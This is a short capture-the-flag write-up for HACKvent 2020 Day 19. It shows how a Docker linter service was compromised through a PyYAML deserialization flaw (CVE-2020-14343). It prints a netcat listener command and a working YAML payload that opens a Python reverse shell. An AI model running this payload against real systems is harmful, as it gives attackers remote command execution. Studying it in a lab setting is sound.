HACKvent 2020 - Day 19

01-01-2021 - 1 minute, 0 seconds - CTF

Challenge - Docker Linter Service

Docker Linter is a useful web application ensuring that your Docker-related files follow best practices. Unfortunately, there’s a security issue in there…


This challenge requires a reverse shell. You can use the provided Web Shell or the VPN to solve this challenge (see RESOURCES on top).

Note: The VPN connection information has been updated.


Today's challenge provides us with an instance of a Docker linter. It is possible to link "dockerfile", "docker-compose.yml" and ".env" files.

Each of the linters tells you in the output which tools are used with which result. So we find out that the following tools are applied:

  • hadolint
  • dockerfile_lint
  • dockerlint.js
  • yamllint
  • docker-compose
  • dotenv-linter

After a brief investigation, it turns out that the Python yaml library “pyyaml”, most likely used by yamllint, has an RCE vulnerability that is known but not yet closed (as of 2020-12-19) (CVE-2020-14343).

So we start netcat, our local listener:

nc -l -v -p 4578

and try to exploit the vulnerability described in the github issue with a typical python reverse shell:

  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('',4578));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('sh')"

And there we have a connection! The flag is also found quickly:

Connection to the reverse shell


Next Post Previous Post